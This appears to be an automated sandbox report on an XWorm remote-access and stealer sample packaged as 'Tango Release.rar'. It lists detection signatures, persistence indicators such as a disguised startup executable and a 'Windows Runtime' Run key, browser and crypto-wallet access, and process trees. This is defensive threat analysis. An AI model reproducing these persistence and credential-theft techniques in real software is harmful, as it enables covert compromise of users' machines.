Malware Analysis Report

2024-11-16 13:30

Sample ID 240622-crbksaxbjm
Target Tango Release.rar
SHA256 84e74424f9c3409c334e62f98d8325ad7f2c0e39fe7a17cc0aa2bf042d41c11e
Tags
xworm execution persistence pyinstaller rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

84e74424f9c3409c334e62f98d8325ad7f2c0e39fe7a17cc0aa2bf042d41c11e

Threat Level: Known bad

The file Tango Release.rar was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence pyinstaller rat spyware stealer trojan

Detect Xworm Payload

Xworm

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-22 02:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:20

Platform

win11-20240611-en

Max time kernel

126s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Runtime.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3444 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 3444 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 3444 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\dllhost.exe
PID 3444 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\dllhost.exe
PID 3444 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 3444 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 3444 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 4724 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 4724 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 4724 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 1512 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe
PID 1512 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe
PID 1932 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 3512 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3512 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2436 wrote to memory of 2976 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2436 wrote to memory of 2976 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 2344 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2344 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2844 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2436 wrote to memory of 796 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2436 wrote to memory of 796 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 5044 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 4596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1892 wrote to memory of 4596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1012 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1012 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 2436 wrote to memory of 4636 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2436 wrote to memory of 4636 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
